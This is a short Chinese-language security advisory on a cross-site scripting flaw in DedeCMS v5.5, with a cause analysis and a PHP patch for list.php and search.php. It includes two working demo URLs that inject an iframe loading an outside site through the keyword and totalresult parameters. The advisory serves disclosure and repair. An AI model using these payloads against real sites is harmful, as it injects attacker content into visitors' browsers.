我要评论
影响版本:
dedecmscms v5.5
截止2010-03-18 17:50之前下载的所有版本,包含gbk和utf-8版本
漏洞描述:
北洋贱队(http://bbs.seceye.org)首发
demo1:http://www.dedecms.com/plus/search.php?keyword=%22%3e%3ciframe%20src=http://www.gohack.org%3e&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&totalresult=%3ciframe%20src=http://www.gohack.org%3e&pageno=2
demo2:http://www.dedecms.com/plus/list.php?tid=6&totalresult=%3ciframe%20src=http://www.gohack.org%3e&nativeplace=0&infotype=0&keyword=&orderby=hot&pageno=2
漏洞原因:
变量过滤不严格和未正确初始化变量。
解决办法:
search.php 重置关键字变量
list.php 加上变量totalresult的类型检验
dedecms v5.5的修改方法:修改的文件时list.php
dedecms v5.1的修改方法:修改的文件时search.php文件
list.php使用了以后有个问题会出现就是totalresult默认下为0,这样查看列表页时就始终显示第一页,推荐使用如下写法:
$totalresult = (isset($totalresult) && is_numeric($totalresult) ? $totalresult : null);
也就是把0换成null,即可!
- 站内搜索
发表评论